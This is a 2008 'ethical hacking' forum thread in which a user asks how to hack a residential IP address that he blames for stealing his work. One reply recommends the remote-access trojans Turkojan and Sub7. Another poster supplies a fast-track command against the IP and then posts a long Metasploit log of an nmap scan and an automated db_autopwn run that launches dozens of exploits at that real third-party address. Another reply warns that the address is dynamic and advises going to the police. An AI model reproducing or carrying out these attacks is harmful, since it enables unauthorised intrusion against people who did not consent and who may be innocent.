Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   I got the IP addres, How do I get acces to computer? [HELP] (http://www.go4expert.com/forums/i-ip-addres-i-acces-computer-help-t15480/)

sir shutter 12Dec2008 22:26

I got the IP addres, How do I get acces to computer? [HELP]
 
Hello, I have been hacked by some people thiefing my work for month's, I trusted them but now they hacked me, and I got their IP addres from special hackers, I wish to know how to hack them or if you can hack them for me, that would be great first of all add me on my msn :- Rockingbaby223@hotmail.com, and lets speak about what can you do with them they really hacked alot of my work, thanks, there is there IP : 82.32.25.149

Please do whatever you can do to ping them or so.. thanks!

Signed,
Sir shutter

shabbir 12Dec2008 23:38

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
Ask the special hacker to do it for you as this is Ethical hacking forum only.

neo_vi 13Dec2008 11:28

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
s. but u can try and tools like turkojan and sub7

xpi0t0s 13Dec2008 21:17

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
Just the IP won't do you much good; it's a Telewest Broadband IP address which probably won't be very static. I'm on broadband too and to get a new IP address I just switch my BB modem off and on again. So if you hack just the IP address there's a good chance you won't hack the people you're interested in and you just end up attacking someone who's completely innocent.

If you have specific dates and times, Telewest most likely log who had what IP when, so if you report the matter to the police they will have the necessary weight to get the relevant info off Telewest and you can pursue them through the courts.

growingboy 21Dec2008 13:35

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
s. just tell whether its static IP or dynamic IP. If its static IP u can hack using that IP. If its dynamic IP u can't do it.

NDL 21Dec2008 15:47

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
Quote:

Originally Posted by growingboy (Post 40468)
s. just tell whether its static IP or dynamic IP. If its static IP u can hack using that IP. If its dynamic IP u can't do it.

lol ya in here <SL> 90% ARE DYNAMIC ONE also so always worying heart :P

XXxxImmortalxxXX 23Dec2008 11:24

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
COUGH COUGH


get backtrack


use

Code:

./fast-track.py -i 4  82.32.25.149

XXxxImmortalxxXX 23Dec2008 12:06

Re: I got the IP addres, How do I get acces to computer? [HELP]
 
here is the scan i did on the ip

nothing found


Quote:

msf > load db_sqlite3[*] Successfully loaded plugin: db_sqlite3
msf > db_destroy pentest
[-] Error while running command db_destroy: No such file or directory - pentest

Call stack:
/pentest/exploits/framework3/plugins/db_sqlite3.rb:125:in `unlink'
/pentest/exploits/framework3/plugins/db_sqlite3.rb:125:in `cmd_db_destroy'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:125:in `run'
/pentest/exploits/framework3/msfconsole:78
msf > db_create pentest[*] Creating a new database instance...[*] Successfully connected to the database[*] File: pentest
msf > db_nmap -PN 82.32.25.149[*] exec: "/usr/local/bin/nmap" "-PN" "82.32.25.149" "-oX" "/tmp/dbnmap.6888.0"
NMAP:
NMAP: Starting Nmap 4.60 ( http://nmap.org ) at 2008-12-22 14:16 GMT
NMAP: Interesting ports on 82-32-25-149.cable.ubr04.aztw.blueyonder.co.uk (82.32.25.149):
NMAP: Not shown: 1713 filtered ports
NMAP: PORT STATE SERVICE
NMAP: 80/tcp open http
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 31.816 seconds
msf > db_autopwn -p -t -e[*] Analysis completed in 6.95850586891174 seconds (0 vulns / 0 refs)[*] Matched auxiliary/scanner/http/frontpage against 82.32.25.149:80...[*] Matched exploit/windows/isapi/w3who_query against 82.32.25.149:80...[*] >> Exception from exploit/windows/isapi/w3who_query: Connection reset by peer[*] Matched exploit/windows/isapi/nsiislog_post against 82.32.25.149:80...[*] Launching exploit/windows/isapi/nsiislog_post (3/49) against 82.32.25.149:80...
[*] Matched exploit/windows/iis/ms01_033_idq against 82.32.25.149:80...[*] Brute forcing with 3 possible targets[*] Started bind handler[*] Trying target Windows 2000 -MS03-019...[*] Launching exploit/windows/iis/ms01_033_idq (4/49) against 82.32.25.149:80...[*] Sending request...[*] Started bind handler[*] Matched exploit/windows/http/sybase_easerver against 82.32.25.149:8080...[*] Launching exploit/windows/http/sybase_easerver (5/49) against 82.32.25.149:8080...[*] Matched exploit/windows/http/shttpd_post against 82.32.25.149:80...[*] Trying target Windows 2000 Pro English SP0...[*] Launching exploit/windows/http/shttpd_post (6/49) against 82.32.25.149:80...[*] Matched exploit/windows/http/savant_31_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/savant_31_overflow (7/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/multi/php/php_unserialize_zval_cookie against 82.32.25.149:80...[*] Launching exploit/multi/php/php_unserialize_zval_cookie (8/49) against 82.32.25.149:80...[*] Matched exploit/windows/proxy/bluecoat_winproxy_host against 82.32.25.149:80...[*] Launching exploit/windows/proxy/bluecoat_winproxy_host (9/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/privatewire_gateway against 82.32.25.149:80...[*] Launching exploit/windows/http/privatewire_gateway (10/49) against 82.32.25.149:80...[*] Trying target WinProxy <= 6.1 R1a Universal...[*] Started bind handler[*] Matched exploit/windows/http/hp_nnm against 82.32.25.149:80...[*] Launching exploit/windows/http/hp_nnm (11/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/pajax_remote_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/pajax_remote_exec (12/49) against 82.32.25.149:80...[*] Trying target HP OpenView Network Node Manager 7.50 / Windows 2000 All...[*] Started bind handler[*] Trying Windows 2000 English SP4 using jmp esp at 77e3c256[*] Matched exploit/multi/realserver/describe against 82.32.25.149:80...[*] Launching exploit/multi/realserver/describe (13/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/isapi/fp30reg_chunked against 82.32.25.149:80...[*] RealServer universal exploit launched against 82.32.25.149[*] Launching exploit/windows/isapi/fp30reg_chunked (14/49) against 82.32.25.149:80...[*] Kill the master rmserver pid to prevent shell disconnect[*] Started bind handler[*] Matched exploit/windows/http/psoproxy91_overflow against 82.32.25.149:8080...[*] Creating overflow request for fp30reg.dll...[*] Matched exploit/windows/http/apache_chunked against 82.32.25.149:80...[*] Launching exploit/windows/http/apache_chunked (16/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/oracle9i_xdb_pass against 82.32.25.149:8080...[*] Launching exploit/windows/http/oracle9i_xdb_pass (17/49) against 82.32.25.149:8080...[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ][*] Started bind handler[*] Matched exploit/windows/iis/ms02_018_htr against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms02_018_htr (18/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/sphpblog_file_upload against 82.32.25.149:80...[*] Launching exploit/unix/webapp/sphpblog_file_upload (19/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_wordpress_lastpost against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_wordpress_lastpost (20/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_vbulletin_template against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_vbulletin_template (21/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/iis/ms03_007_ntdll_webdav against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms03_007_ntdll_webdav (22/49) against 82.32.25.149:80...[*] Trying target Oracle 9.2.0.1 Universal...[*] Started bind handler[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ][*] Matched exploit/windows/http/badblue_passthru against 82.32.25.149:80...
[-] Exploit failed: Connection reset by peer[*] Launching exploit/windows/http/badblue_passthru (23/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/admin/cisco/ios_http_auth_bypass against 82.32.25.149:80...[*] Matched exploit/windows/http/xitami_if_mod_since against 82.32.25.149:80...[*] Trying target BadBlue 2.72b Universal...[*] Launching exploit/windows/http/xitami_if_mod_since (25/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/google_proxystylesheet_exec against 82.32.25.149:80...[*] Waiting for payload to execute...[*] >> Exception from exploit/unix/webapp/google_proxystylesheet_exec: protected method `autofilter' called for #
<#<Class:0xb6c916f0>:0xb6a86a18>[*] Matched exploit/windows/isapi/rsa_webagent_redirect against 82.32.25.149:80...[*] Launching exploit/windows/isapi/rsa_webagent_redirect (27/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/windows/iis/ms01_023_printer against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms01_023_printer (28/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ][*] Matched exploit/windows/http/trendmicro_officescan against 82.32.25.149:8080...[*] Launching exploit/windows/http/trendmicro_officescan (29/49) against 82.32.25.149:8080...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/windows/http/ipswitch_wug_maincfgret against 82.32.25.149:80...[*] Launching exploit/windows/http/ipswitch_wug_maincfgret (30/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/windows/http/ia_webmail against 82.32.25.149:80...[*] Launching exploit/windows/http/ia_webmail (31/49) against 82.32.25.149:80...[*] Trying target WhatsUP Gold 8.03 Universal...
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Started bind handler[*] Matched exploit/windows/http/apache_modjk_overflow against 82.32.25.149:80...[*] Sending request...[*] Launching exploit/windows/http/apache_modjk_overflow (32/49) against 82.32.25.149:80...[*] Matched exploit/unix/webapp/phpbb_highlight against 82.32.25.149:80...[*] Started bind handler[*] Launching exploit/unix/webapp/phpbb_highlight (33/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/scanner/http/writable against 82.32.25.149:80...[*] Trying target mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)...[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/4 ][*] Matched auxiliary/scanner/http/frontpage_login against 82.32.25.149:80...[*] Matched exploit/windows/http/minishare_get_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/minishare_get_overflow (36/49) against 82.32.25.149:80...[*] Matched exploit/windows/http/mailenable_auth_header against 82.32.25.149:80...[*] Launching exploit/windows/http/mailenable_auth_header (37/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/badblue_ext_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/badblue_ext_overflow (38/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_xmlrpc_eval against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_xmlrpc_eval (39/49) against 82.32.25.149:80...[*] Trying target BadBlue 2.5 (Universal)...[*] Started bind handler[*] Matched exploit/unix/webapp/cacti_graphimage_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/cacti_graphimage_exec (40/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/scanner/http/version against 82.32.25.149:80...[*] Matched auxiliary/dos/cisco/ios_http_percentpercent against 82.32.25.149:80...[*] Matched exploit/windows/http/navicopa_get_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/navicopa_get_overflow (43/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/guestbook_ssi_exec (44/49) against 82.32.25.149:80...[*] Trying target NaviCOPA 2.0.1 Universal[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/1 ][*] Started bind handler[*] Matched exploit/unix/webapp/barracuda_img_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/barracuda_img_exec (45/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_include against 82.32.25.149:80...[*] >> Exception from exploit/unix/webapp/php_include: protected method `autofilter' called for #<#<Class:0xb6bd2
5fc>:0xb6a76564>[*] Matched exploit/unix/webapp/openview_connectednodes_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/openview_connectednodes_exec (47/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/awstats_configdir_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/awstats_configdir_exec (48/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/bsdi/softcart/mercantec_softcart against 82.32.25.149:80...[*] Launching exploit/bsdi/softcart/mercantec_softcart (49/49) against 82.32.25.149:80...[*] Started bind handler
msf >

msf >[*] Trying efbf3000...

msf >
msf >

msf >[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/3 ]

msf >[*] exploit failed
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/5 ]
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/7 ][*] Trying efbf32c1...[*] Refreshing the remote dllhost.exe process...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/2 ]
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/6 ]
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying efbf3582...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/0 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/4 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/1 ][*] Trying efbf3843...
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/3 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/5 ][*] Trying efbf3b04...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/7 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/2 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/6 ][*] Trying efbf3dc5...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/0 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/4 ][*] Trying efbf4086...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/1 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/3 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/5 ][*] Trying efbf4347...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/7 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/2 ][*] Trying efbf4608...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/6 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/0 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/4 ][*] Trying efbf48c9...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/1 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/3 ][*] Trying efbf4b8a...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/5 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/7 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/2 ][*] Trying efbf4e4b...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/6 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/0 ][*] Trying efbf510c...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/4 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/1 ][*] Trying efbf53cd...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/3 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/5 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/7 ][*] Trying efbf568e...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/2 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/6 ][*] Trying efbf594f...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/0 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/4 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/1 ][*] Trying efbf5c10...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/3 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/5 ][*] Trying efbf5ed1...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/7 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/2 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/6 ][*] Trying efbf6192...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/5 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/4 ][*] Trying efbf6453...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/1 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/3 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/0 ][*] Trying efbf6714...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/7 ][*] Trying Windows 2000 English [ 0x75022ac4/2 ][*] Trying efbf69d5...[*] Trying Windows 2000 English [ 0x75022ac4/6 ][*] Trying Windows 2000 English [ 0x75022ac4/5 ][*] Trying Windows 2000 English [ 0x75022ac4/4 ][*] Trying efbf6c96...[*] Trying Windows 2000 English [ 0x75022ac4/1 ][*] Trying Windows 2000 English [ 0x75022ac4/3 ][*] Trying efbf6f57...[*] Trying Windows 2000 English [ 0x75022ac4/0 ][*] Trying Windows 2000 English [ 0x75022ac4/7 ][*] Trying efbf7218...[*] Trying Oracle 8.1.7 Apache 1.3.12 [ 0x1d84d42c/7 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/5 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/6 ][*] Trying efbf74d9...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/0 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/4 ][*] Trying efbf779a...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/1 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/3 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/2 ][*] Trying efbf7a5b...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/7 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/5 ][*] Trying efbf7d1c...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/6 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/0 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/4 ][*] Trying efbf7fdd...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/1 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/3 ][*] Trying efbf829e...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/2 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/7 ][*] Trying Debugging Target [ 0xcafebabe/0 ][*] Trying efbf855f...[*] Trying Debugging Target [ 0xcafebabe/1 ][*] Trying Debugging Target [ 0xcafebabe/2 ][*] Trying efbf8820...[*] Trying Debugging Target [ 0xcafebabe/3 ][*] Trying Debugging Target [ 0xcafebabe/4 ][*] Trying Debugging Target [ 0xcafebabe/5 ][*] Trying efbf8ae1...[*] Trying Debugging Target [ 0xcafebabe/6 ][*] Trying Debugging Target [ 0xcafebabe/7 ][*] Trying efbf8da2...[*] Trying efbf9063...[*] Trying efbf9324...[*] Trying efbf95e5...[*] Trying efbf98a6...[*] Trying efbf9b67...[*] Trying efbf9e28...[*] Trying efbfa0e9...[*] Trying efbfa3aa...[*] Trying efbfa66b...[*] Trying efbfa92c...[*] Trying efbfabed...[*] Trying efbfaeae...[*] Trying efbfb16f...[*] Trying efbfb430...[*] Trying efbfb6f1...[*] Trying efbfb9b2...[*] Trying efbfbc73...[*] Trying efbfbf34...[*] Trying efbfc1f5...[*] Trying efbfc4b6...[*] Trying efbfc777...[*] Trying efbfca38...[*] Trying efbfccf9...[*] Trying efbfcfba...[*] Trying efbfd27b...[*] Trying efbfd53c...[*] Trying efbfd7fd...[*] Trying efbfdabe...[*] Trying efbfdd7f...[*] Trying efbfe040...[*] Trying efbfe301...[*] Trying efbfe5c2...[*] Trying efbfe883...[*] Trying efbfeb44...[*] Trying efbfee05...[*] Trying efbff0c6...[*] Trying efbff387...[*] Trying efbff648...[*] Trying efbff909...[*] Trying efbffbca...[*] Trying efbffe8b...


All times are GMT +5.5. The time now is 02:33.